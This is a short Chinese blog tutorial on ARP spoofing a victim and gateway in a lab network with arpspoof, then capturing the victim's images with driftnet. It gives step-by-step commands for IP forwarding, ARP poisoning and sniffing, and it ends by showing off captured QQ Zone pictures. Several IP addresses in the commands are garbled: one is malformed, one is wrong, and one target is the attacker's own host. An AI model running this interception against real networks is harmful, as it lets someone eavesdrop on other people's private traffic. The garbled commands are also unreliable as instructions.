arpspoof+driftnet+ ARP欺骗简单图片抓取

arpspoof+driftnet+ ARP欺骗简单图片抓取

driftnet是一款简单而使用的图片捕获工具，可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片
环境

受害ip：192.168.228.130
攻击ip：192.168.228.129
网关：192.168.228.2

条件

1，开启或关闭IP转发
2，向被攻击机器发送arp欺骗数据包，冒充网关
3，向网关发送arp数据欺骗网关，冒充被攻击机器
4，运行driftnet截取图片

开启IP转发功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

重定向受害者的流量传送给攻击者

arpspoof -t 192.168.130 168.168.228.2 -i eth0

使网关的数据重定向到攻击者的机器。（流量由网关到攻击者再到受攻击者）

arpspoof -t 168.168.228.2 192.168.228.129 -i eth0

监听

driftnet -i eth0

抓到的QQ空间图片-^^-

__EOF__

作　　者：晓枫
出　　处：https://www.cnblogs.com/hackxf/p/9563438.html
关于博主：编程路上的小学生，热爱技术，喜欢专研。评论和私信会在第一时间回复。或者直接私信我。
版权声明：署名 - 非商业性使用 - 禁止演绎，协议普通文本 | 协议法律文本。
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！